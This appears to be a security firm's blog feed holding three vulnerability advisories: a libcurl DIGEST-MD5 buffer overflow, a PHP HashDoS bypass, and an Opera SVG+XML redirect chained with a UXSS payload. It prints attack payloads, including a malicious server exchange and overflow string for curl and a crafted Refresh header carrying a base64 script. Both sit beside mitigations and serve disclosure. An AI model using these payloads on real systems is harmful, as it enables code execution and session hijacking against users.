Blog.Volemahttp://blog.volema.com/2013-02-06T10:00:00+01:00cURL buffer overflow2013-02-06T10:00:00+01:00Volema teamtag:blog.volema.com,2013-02-06:curl-rce.html<p>Volema found remotely exploitable buffer overflow vulnerability in libcurl POP3, SMTP protocol handlers which lead to code execution (RCE).
When negotiating SASL DIGEST-MD5 authentication, the function Curl_sasl_create_digest_md5_message() uses the data provided from the server
without doing the proper length checks and that data is then appended to a local fixed-size buffer on the stack.</p>
<p>Vendor <a href="http://curl.haxx.se/docs/adv_20130206.html">notified</a>, CVE-2013-0249 relased.</p>
<p><strong>Attack Concept Outline</strong></p>
<p>We have the permissions to send custom HTTP requests with curl.
We send request to our http://evilserver.com/</p>
<div class="codehilite"><pre><span class="n">GET</span> <span class="o">/</span> <span class="n">HTTP</span><span class="o">/</span>1<span class="p">.</span>0
<span class="n">Host</span><span class="p">:</span> <span class="n">evilserver</span><span class="p">.</span><span class="n">com</span>
</pre></div>
<p>server answers with</p>
<div class="codehilite"><pre><span class="n">HTTP</span><span class="o">/</span>1<span class="p">.</span>0 302 <span class="n">Found</span>
<span class="n">Location</span><span class="p">:</span> <span class="n">pop3</span><span class="p">:</span><span class="o">//</span><span class="n">x</span><span class="p">:</span><span class="n">x</span><span class="p">@</span><span class="n">evilserver</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="p">.</span>
</pre></div>
<p>"smart" curl interpretes redirect and connects to evilserver.com port 110/TCP using POP3 proto.
Server answers</p>
<div class="codehilite"><pre><span class="o">+</span><span class="n">OK</span> <span class="n">POP3</span> <span class="n">server</span> <span class="n">ready</span>
</pre></div>
<p>curl sends</p>
<div class="codehilite"><pre><span class="n">CAPA</span>
</pre></div>
<p>servers answers with DIGEST-MD5 only</p>
<div class="codehilite"><pre><span class="o">+</span><span class="n">OK</span> <span class="n">List</span> <span class="n">of</span> <span class="n">capabilities</span> <span class="n">follows</span>
<span class="n">SASL</span> <span class="n">DIGEST</span><span class="o">-</span><span class="n">MD5</span>
<span class="n">IMPLEMENTATION</span> <span class="n">dumbydumb</span> <span class="n">POP3</span> <span class="n">server</span>
</pre></div>
<p>so, libcurl has to send</p>
<div class="codehilite"><pre><span class="n">AUTH</span> <span class="n">DIGEST</span><span class="o">-</span><span class="n">MD5</span>
</pre></div>
<p>then server sends the payload</p>
<div class="codehilite"><pre><span class="o">+</span> <span class="n">cmVhbG09IkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBIixub25jZT0iT0E2TUc5dEVRR20yaGgiLHFvcD0iYXV0aCIsYWxnb3JpdGhtPW1kNS1zZXNzLGNoYXJzZXQ9dXRmLTg</span><span class="p">=</span>
</pre></div>
<p>and overflow happens because of fixed "uri" buffer size (128) and "realm" which is also 128 bytes</p>
<div class="codehilite"><pre><span class="n">realm</span><span class="p">=</span>"<span class="n">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span>"<span class="p">,</span><span class="n">nonce</span><span class="p">=</span>"<span class="n">OA6MG9tEQGm2hh</span>"<span class="p">,</span><span class="n">qop</span><span class="p">=</span>"<span class="n">auth</span>"<span class="p">,</span><span class="n">algorithm</span><span class="p">=</span><span class="n">md5</span><span class="o">-</span><span class="n">sess</span><span class="p">,</span><span class="n">charset</span><span class="p">=</span><span class="n">utf</span><span class="o">-</span>8
</pre></div>
<p>how it looks in gdb</p>
<div class="codehilite"><pre><span class="n">Program</span> <span class="n">received</span> <span class="n">signal</span> <span class="n">SIGSEGV</span><span class="p">,</span> <span class="n">Segmentation</span> <span class="n">fault</span><span class="p">.</span>
0<span class="n">x00007fd2b238298d</span> <span class="n">in</span> ?? <span class="p">()</span> <span class="n">from</span> <span class="o">/</span><span class="n">lib</span><span class="o">/</span><span class="n">x86_64</span><span class="o">-</span><span class="n">linux</span><span class="o">-</span><span class="n">gnu</span><span class="o">/</span><span class="n">libc</span><span class="p">.</span><span class="n">so</span><span class="p">.</span>6
<span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">bt</span>
#0 0<span class="n">x00007fd2b238298d</span> <span class="n">in</span> ?? <span class="p">()</span> <span class="n">from</span> <span class="o">/</span><span class="n">lib</span><span class="o">/</span><span class="n">x86_64</span><span class="o">-</span><span class="n">linux</span><span class="o">-</span><span class="n">gnu</span><span class="o">/</span><span class="n">libc</span><span class="p">.</span><span class="n">so</span><span class="p">.</span>6
#1 0<span class="n">x00007fd2b2a5cc07</span> <span class="n">in</span> <span class="n">Curl_sasl_create_digest_md5_message</span> <span class="p">()</span>
<span class="n">from</span> <span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">kyprizel</span><span class="o">/</span><span class="n">test</span><span class="o">/</span><span class="n">curl</span><span class="o">-</span>7<span class="p">.</span>28<span class="p">.</span>1<span class="o">/</span><span class="n">lib</span><span class="o">/</span><span class="p">.</span><span class="n">libs</span><span class="o">/</span><span class="n">libcurl</span><span class="p">.</span><span class="n">so</span><span class="p">.</span>4
#2 0<span class="n">x4141414141414141</span> <span class="n">in</span> ?? <span class="p">()</span>
<span class="p">...</span>
#1469 0<span class="n">x4141414141414141</span> <span class="n">in</span> ?? <span class="p">()</span>
#1470 0<span class="n">x656d616e72657375</span> <span class="n">in</span> ?? <span class="p">()</span>
<span class="n">Cannot</span> <span class="n">access</span> <span class="n">memory</span> <span class="n">at</span> <span class="n">address</span> 0<span class="n">x7fff63b8b000</span>
</pre></div>
<p>Original exploit: <a href="http://i.volema.com/pop3d.py">pop3d.py</a>.</p>
<p><strong>Mitigation</strong></p>
<p>We recommend to disable protocols other than HTTP(S) in your application using options CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS.
libcurl version should be updated.</p>PHP <=5.4.8, <=5.3.18 with mbstring.encoding_translation = On is vulnerable to HashDoS2012-11-26T10:00:00+01:00Volema teamtag:blog.volema.com,2012-11-26:php-mbstring-hash-dos.html<p>Hashdos attack on scripting languages was introduced first time at 28C3 conference [1]. It targets the performance bottleneck in keeping large hash tables made of request parameters.</p>
<p>The main way to protect from this attack is to limit the number of request parameters. In PHP it is done through the parameter <em>max_input_vars</em>, but this parameter is ignored if <em>mbstring.encoding_translation</em> parameter is set to "On". Therefore, it is possible to send a request with a large number of parameters to perform a HashDoS attack.</p>
<p>Fortunately, the default value for mbstring.encoding_translation is "Off". This vulnerability mainly affects Japanese web sites that use automated encoding conversion widely. However, it is strongly recommended to update to the latest version of PHP.</p>
<p><strong>References</strong></p>
<p>[1] Alexander ‘alech’ Klink, Julian | zeri <a href="http://events.ccc.de/congress/2011/Fahrplan/events/4680.en.html">"Effective denial of service attacks against web application platforms"</a>, 29C3, 2011</p>
<p>[2] Hiroshi Tokumaru <a href="http://blog.tokumaru.org/2012/11/php548-is-vulnerable-to-hashdos.html">"セキュリティ情報:PHP5.4.8、PHP5.3.18以前にhashdos脆弱性"</a></p>Opera SVG+XML Handling Vulnerability2012-10-06T10:00:00+02:00Volema teamtag:blog.volema.com,2012-10-06:opera-svg-xml-shortcut-uxss.html<p>Some time ago we have found in the wild an exploit for a vulnerability allowing to redirect an <a href="http://opera.com">Opera</a> user to an arbitrary host by just inserting an <img> tag on the victim site.
This vulnerability was actively exploited for redirecting users to a phishing site, which imitated a large and popular web-portal, with a purpose to steal users credentials.
Posting of a malicious image on the victim site was enough for successful exploitation of the vulnerability. The vulnerability was reported to Opera Software, but they decided this is not a security bug and refused to patch it urgently.</p>
<p>The issue lies in the process of handling 'image/svg+xml' <a href="http://en.wikipedia.org/wiki/Content-Type">Content-Type</a> with the <a href="http://en.wikipedia.org/wiki/URL_redirection#Refresh_Meta_tag_and_HTTP_refresh_header">Refresh</a> server response header.</p>
<div class="codehilite"><pre><span class="n">Refresh</span><span class="o">:</span> <span class="mi">0</span><span class="o">;</span> <span class="n">url</span><span class="o">=</span><span class="n">data</span><span class="o">:</span><span class="n">application</span><span class="sr">/internet-shortcut,[INTERNETSHORTCUT]%0D%0AURL=http://volema.com/</span>
<span class="n">Content</span><span class="o">-</span><span class="n">Type</span><span class="o">:</span> <span class="n">image</span><span class="o">/</span><span class="n">svg</span><span class="o">+</span><span class="n">xml</span><span class="o">;</span>
<span class="o"><</span><span class="n">svg</span> <span class="n">xmlns</span><span class="o">=</span><span class="s2">"http://www.w3.org/2000/svg"</span> <span class="n">version</span><span class="o">=</span><span class="s2">"1.1"</span> <span class="o">/></span>
</pre></div>
<p>Attacker can forge a redirect of the image resource to a data: scheme URL that has an 'application/internet-shortcut' embedded in it.
Upon hitting such an content-type, Opera acts like if the user opens an internet shortcut from his file manager, and essentially redirects the user to an arbitrary URL that we specify in the internet shortcut. In the above example, the URL is http://volema.com/</p>
<p>Although at first sight there is nothing to worry about, but in case the victim site has at least one <a href="https://www.owasp.org/index.php/Open_redirect">HTTP open redirect</a>,
with SVG+XML handling vulnerability it is possible to use the <a href="http://blog.detectify.com/post/32947196572/universal-xss-in-opera">recently-published 0-day Opera XSS vulnerability</a> (which requires a victim to click the malicious link manually) without any user interaction.</p>
<p><strong>An example</strong></p>
<p>We have the permissions to post any images to target site and there is also a script that allows us to yield any HTTP redirects.</p>
<p>The victim visits http://target.com/blog/ where the malicious <img> is placed in the comment section.</p>
<div class="codehilite"><pre><span class="o"><</span><span class="n">img</span> <span class="n">src</span><span class="p">=</span>"<span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">evil</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">evil</span><span class="p">.</span><span class="n">png</span>" <span class="o">/></span>
</pre></div>
<p>When the browser tries to access 'evil.png', the malicious script responds with an exploit:</p>
<div class="codehilite"><pre><span class="n">Refresh</span><span class="o">:</span> <span class="mi">0</span><span class="o">;</span> <span class="n">url</span><span class="o">=</span><span class="n">data</span><span class="o">:</span><span class="n">application</span><span class="o">/</span><span class="n">internet</span><span class="o">-</span><span class="n">shortcut</span><span class="o">,%</span><span class="mi">5</span><span class="n">BInternetShortcut</span><span class="o">%</span><span class="mi">5</span><span class="n">D</span><span class="o">%</span><span class="mi">0</span><span class="n">D</span><span class="o">%</span><span class="mi">0</span><span class="n">AURL</span><span class="o">%</span><span class="mi">3</span><span class="n">Dhttp</span><span class="o">%</span><span class="mi">3</span><span class="n">A</span><span class="o">%</span><span class="mi">2</span><span class="n">F</span><span class="o">%</span><span class="mi">2</span><span class="n">Ftarget</span><span class="o">.</span><span class="na">com</span><span class="o">%</span><span class="mi">2</span><span class="n">Fopenredirect</span><span class="o">%</span><span class="mi">3</span><span class="n">Fparam</span><span class="o">%</span><span class="mi">3</span><span class="n">Ddata</span><span class="o">%</span><span class="mi">3</span><span class="n">Atext</span><span class="o">%</span><span class="mi">2</span><span class="n">Fhtml</span><span class="o">%</span><span class="mi">3</span><span class="n">Bbase64</span><span class="o">%</span><span class="mi">2</span><span class="n">CPHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg</span><span class="o">%</span><span class="mi">3</span><span class="n">D</span><span class="o">%</span><span class="mi">3</span><span class="n">D</span>
<span class="n">Content</span><span class="o">-</span><span class="n">Type</span><span class="o">:</span> <span class="n">image</span><span class="o">/</span><span class="n">svg</span><span class="o">+</span><span class="n">xml</span><span class="o">;</span>
<span class="o"><</span><span class="n">svg</span> <span class="n">xmlns</span><span class="o">=</span><span class="s2">"http://www.w3.org/2000/svg"</span> <span class="n">version</span><span class="o">=</span><span class="s2">"1.1"</span> <span class="o">/></span>
</pre></div>
<p>Then Opera interprets internet shortcut from Refresh header data and redirects the victum to</p>
<div class="codehilite"><pre><span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">target</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">openredirect</span>?<span class="n">param</span><span class="p">=</span><span class="n">data</span><span class="c">%3atext%2fhtml%3bbase64%2cPHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg%3d%3d</span>
</pre></div>
<p>This URL has an exploit for <a href="http://blog.detectify.com/post/32947196572/universal-xss-in-opera">UXSS 0-day Opera vulnerability</a> embedded in it.</p>
<p>Till the moment described vulnerabilities are fixed we recommend all Opera users to disable automatical handling of internet shortcuts:
Tools -> Preferences -> Advanced -> Downloads -> Uncheck "Hide file types opened with Opera" -> Select "application/internet-shortcut" -> Edit... -> Select "Show download dialog".</p>
<p><img src="http://i.volema.com/wue0lek.png" alt="result" /></p>
<p>Also the <a href="http://en.wikipedia.org/wiki/Privacy_mode">Private Tab</a> is not vulnerable.</p>